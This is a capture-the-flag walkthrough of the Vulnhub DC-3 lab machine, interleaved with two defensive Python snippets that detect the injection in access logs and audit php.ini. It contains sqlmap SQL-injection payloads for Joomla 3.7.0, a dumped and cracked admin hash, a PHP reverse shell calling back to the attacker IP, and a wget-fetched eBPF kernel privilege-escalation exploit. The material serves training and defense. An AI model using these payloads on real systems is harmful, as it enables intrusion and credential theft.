[Penetration Testing] Vulnhub DC-3

I. Environment Preparation

Vulnhub VM download:

Official page: https://www.vulnhub.com/entry/dc-32,312/

Attacker: 192.168.207.130
Target: 192.168.207.128

After downloading the VM, import it directly into VMware Workstation Pro and start it, with the network adapter set to NAT mode. Goal: obtain the flag in the root directory of the target machine.

Carrying out the penetration test

II. Information Gathering

1. Host scan

arp-scan -l


The target's IP address is 192.168.207.128; next, scan it in detail with nmap.

2. Port scan

Use nmap to enumerate the ports open on the target

nmap -sS -sV -sC -p- 192.168.207.128 -oN nmap_full_scan


Only port 80 is open.

Let's open it in the browser.

A login page.

3. Directory enumeration

dirsearch -u 192.168.207.128


With dirsearch we can see an administrator directory, which should be the admin backend.


4. Log in to the site and look for vulnerabilities

Let's take a look at the site.


A well-known CMS, Joomla. The English text on the left of the page reads:

This time, there is only one flag, one entry point and no clues. To get the flag, you will obviously have to gain root privileges (privilege escalation). How you become root is up to you - and, obviously, the system. Good luck, and I hope you enjoy this little challenge.

First, install the tool

Installing joomscan

sudo apt-get install joomscan

Scan with joomscan

joomscan -u http://192.168.207.128/


Here we learn the version is Joomla 3.7.0, so we can look for known vulnerabilities.

Search online or use a tool; I searched on Baidu.


This vulnerability is an SQL injection.

We can also look it up with Kali's tools

searchsploit joomla 3.7.0
searchsploit -x php/webapps/42033.txt

This is what was found:

# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917


URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27


Using Sqlmap:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]


Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)
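As an added example (not part of the original post or the exploit-db entry), the following Python flags requests that probe the com_fields list[fullordering] parameter in Apache combined-format access logs, so a defender can spot the payload patterns listed above. The log lines are constructed; any value that is not a plain column name with an optional ASC/DESC direction is reported.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format, not from the original post).
SAMPLE_LOG = r'''
10.0.0.5 - - [19/May/2017:10:00:01 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.ordering%20ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [19/May/2017:10:00:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27 HTTP/1.1" 500 311 "-" "sqlmap/1.1"
10.0.0.9 - - [19/May/2017:10:00:03 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))GDiu) HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [19/May/2017:10:00:04 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# A legitimate ordering value is a column name, optionally followed by ASC or DESC
# (e.g. "a.ordering ASC"). Anything else, including sqlmap's "*" marker, is suspicious.
BENIGN_ORDERING = re.compile(r'^[A-Za-z0-9_.]+(\s+(ASC|DESC))?$', re.IGNORECASE)


def find_fullordering_probes(log_text):
    """Return one record per request whose list[fullordering] value is not a plain ordering."""
    hits = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        # parse_qs percent-decodes both keys and values, so list%5Bfullordering%5D
        # and list[fullordering] are handled the same way.
        params = parse_qs(urlsplit(m.group('target')).query)
        if params.get('option') != ['com_fields']:
            continue
        for value in params.get('list[fullordering]', []):
            if not BENIGN_ORDERING.match(value.strip()):
                hits.append({'ip': m.group('ip'), 'time': m.group('ts'),
                             'status': m.group('status'), 'value': value})
    return hits
```

The same check also catches the blind and error-based payloads above, since none of them match the column-name shape.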

5. Backend brute force

Based on the payload provided for sqlmap

List the database names with sqlmap

sqlmap -u "http://192.168.207.128/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" --dbs


Next, use sqlmap to list all table names in the joomladb database

sqlmap -u "http://192.168.207.128/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]


We find the #__users table

List the columns of the users table

sqlmap -u "http://192.168.207.128/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" -D "joomladb" -T "#__users" --columns
# query the column names in the #__users table

Information in #__users


Identify the account columns; the account and password columns are usually "username, password"

Dump the data

sqlmap -u "http://192.168.207.128/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb -T '#__users' -C 'id,name,password,username' --dump


Then we use the Kali tool john to crack the hash

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

Put it in a file


Then run the command to crack it

john '/home/kali/桌面/a.txt'


So we now know

Username: admin
Password: snoopy

Visit 192.168.207.128/administrator

Enter the username and password; the login succeeds

Logged in to the backend

III. Vulnerability Probing

The next step is to click

Extensions -> Templates -> Templates

Reverse shell

After exploring the backend, we find that the templates under Extensions -> Templates can execute PHP scripts


Open the page

Either of these two entries works

The editor appears


Click index.php (other PHP files work too) and enter the script inside

When the system has not disabled proc_open, we can use proc_open to get a reverse shell like this one with little effort.

$sock = fsockopen("192.168.207.130", "5555");
$descriptorspec = array(
    0 => $sock,
    1 => $sock,
    2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);

Paste it in and save


Then listen on the port in Kali

nc -lvnp 5555

Then visit 192.168.207.128/index.php


Connection successful
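The shell above only works because proc_open is callable from the web server's PHP. As an added example (not part of the original post), the following Python audits a php.ini for the process-spawning functions a dropped template file could use, showing the weak setting beside a hardened one; both ini fragments are constructed.

```python
import re

# Constructed php.ini fragments (not from the original post).
# WEAK_INI: the only disable_functions line in force is empty; the commented one does not apply.
WEAK_INI = """
; disable_functions = proc_open,popen
disable_functions =
allow_url_fopen = On
"""

HARDENED_INI = """
disable_functions = "proc_open,popen,exec,shell_exec,system,passthru,pcntl_exec"
allow_url_fopen = Off
"""

# Process-spawning functions a PHP file written through the template editor could call;
# proc_open is the one the reverse shell above relies on.
EXEC_FUNCTIONS = {"proc_open", "popen", "exec", "shell_exec", "system", "passthru", "pcntl_exec"}

DIRECTIVE_RE = re.compile(r'^disable_functions\s*=\s*(.*)$')


def disabled_functions(ini_text):
    """Set of functions named by the last active disable_functions directive.

    Lines beginning with ';' are php.ini comments and are ignored; when the
    directive appears more than once, the later occurrence wins, as in php.ini.
    """
    disabled = set()
    for line in ini_text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = DIRECTIVE_RE.match(line)
        if m:
            value = m.group(1).strip().strip('"')
            disabled = {f.strip() for f in value.split(",") if f.strip()}
    return disabled


def still_enabled(ini_text, wanted=EXEC_FUNCTIONS):
    """Functions from `wanted` that the configuration leaves callable, sorted."""
    return sorted(wanted - disabled_functions(ini_text))
```

Disabling these functions only narrows what a written PHP file can do; restricting which backend accounts may edit templates and keeping Joomla patched address the root cause.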

Privilege escalation

python -c "import pty;pty.spawn('/bin/bash')"
# use python to get an interactive shell


Our privileges are still insufficient, so cd /root fails

So we look for a way to escalate privileges

SUID binaries and the like lead nowhere, so consider a kernel vulnerability for privilege escalation

cat /etc/*release    # show distribution info


We find the version

DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"

Using an EXP

Searching with searchsploit for Ubuntu 16.04 privilege escalation turns up a "denial of service" entry that can be used for privilege escalation

searchsploit ubuntu 16.04


The system is Ubuntu 16.04 LTS and the kernel is Linux 4.4.0-21

Now we can search Kali's exploit database for related vulnerabilities, again with searchsploit

Find the entry matching the kernel version

Open the file to see how the vulnerability is exploited

cat /usr/share/exploitdb/exploits/linux/local/39772.txt
┌──(root㉿kali)-[~]
└─# cat /usr/share/exploitdb/exploits/linux/local/39772.txt
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808

In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.

When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
This is done as follows:

/* look for pseudo eBPF instructions that access map FDs and
 * replace them with actual map pointers
 */
static int replace_map_fd_with_map_ptr(struct verifier_env *env)
{
    struct bpf_insn *insn = env->prog->insnsi;
    int insn_cnt = env->prog->len;
    int i, j;

    for (i = 0; i < insn_cnt; i++, insn++) {
        [checks for bad instructions]

        if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
            struct bpf_map *map;
            struct fd f;

            [checks for bad instructions]

            f = fdget(insn->imm);
            map = __bpf_map_get(f);
            if (IS_ERR(map)) {
                verbose("fd %d is not pointing to valid bpf_map\n",
                        insn->imm);
                fdput(f);
                return PTR_ERR(map);
            }

            [...]
        }
    }
    [...]
}


__bpf_map_get contains the following code:

/* if error is returned, fd is released.
 * On success caller should complete fd access with matching fdput()
 */
struct bpf_map *__bpf_map_get(struct fd f)
{
    if (!f.file)
        return ERR_PTR(-EBADF);
    if (f.file->f_op != &bpf_map_fops) {
        fdput(f);
        return ERR_PTR(-EINVAL);
    }

    return f.file->private_data;
}

The problem is that when the caller supplies a file descriptor number referring
to a struct file that is not an eBPF map, both __bpf_map_get() and
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If
__fget_light() detected that the file descriptor table is shared with another
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause
the reference count of the struct file to be over-decremented, allowing an
attacker to create a use-after-free situation where a struct file is freed
although there are still references to it.

A simple proof of concept that causes oopses/crashes on a kernel compiled with
memory debugging options is attached as crasher.tar.


One way to exploit this issue is to create a writable file descriptor, start a
write operation on it, wait for the kernel to verify the file's writability,
then free the writable file and open a readonly file that is allocated in the
same place before the kernel writes into the freed file, allowing an attacker
to write data to a readonly file. By e.g. writing to /etc/crontab, root
privileges can then be obtained.

There are two problems with this approach:

The attacker should ideally be able to determine whether a newly allocated
struct file is located at the same address as the previously freed one. Linux
provides a syscall that performs exactly this comparison for the caller:
kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).

In order to make exploitation more reliable, the attacker should be able to
pause code execution in the kernel between the writability check of the target
file and the actual write operation. This can be done by abusing the writev()
syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays
read accesses, then mmap()s a file containing a struct iovec from that FUSE
filesystem and passes the result of mmap() to writev(). (Another way to do this
would be to use the userfaultfd() syscall.)

writev() calls do_writev(), which looks up the struct file * corresponding to
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies
that the target file is writable, then calls do_readv_writev(), which first
copies the struct iovec from userspace using import_iovec(), then performs the
rest of the write operation. Because import_iovec() performs a userspace memory
access, it may have to wait for pages to be faulted in - and in this case, it
has to wait for the attacker-owned FUSE filesystem to resolve the pagefault,
allowing the attacker to suspend code execution in the kernel at that point
arbitrarily.

An exploit that puts all this together is in exploit.tar. Usage:

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on a Ubuntu 16.04 Desktop system.

Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7


Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

Just download it locally

Kali doesn't seem to be able to download it, so I downloaded it on my host and then copied it into Kali. Download the exp locally,

then drag it to the directory you want; I put it on the Desktop


https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip 

Download it from this link

Start Apache

systemctl start apache2.service


Then move 39772.zip into the Apache web directory

mv 39772.zip /var/www/html

Copy the download link and open it

http://192.168.207.130/39772.zip

Back in the DC-3 shell from earlier, download the exp we just uploaded

wget http://192.168.207.130/39772.zip


Extract the exp

unzip 39772.zip         # extract 39772.zip
cd 39772                # enter 39772
tar -xvf exploit.tar    # extract exploit.tar


Enter ebpf_mapfd_doubleput_exploit and run the exp


Next, run the commands shown in the exploit file

./compile.sh
./doubleput

FLAG


Our privileges are now elevated to root

Go to the root directory and find the flag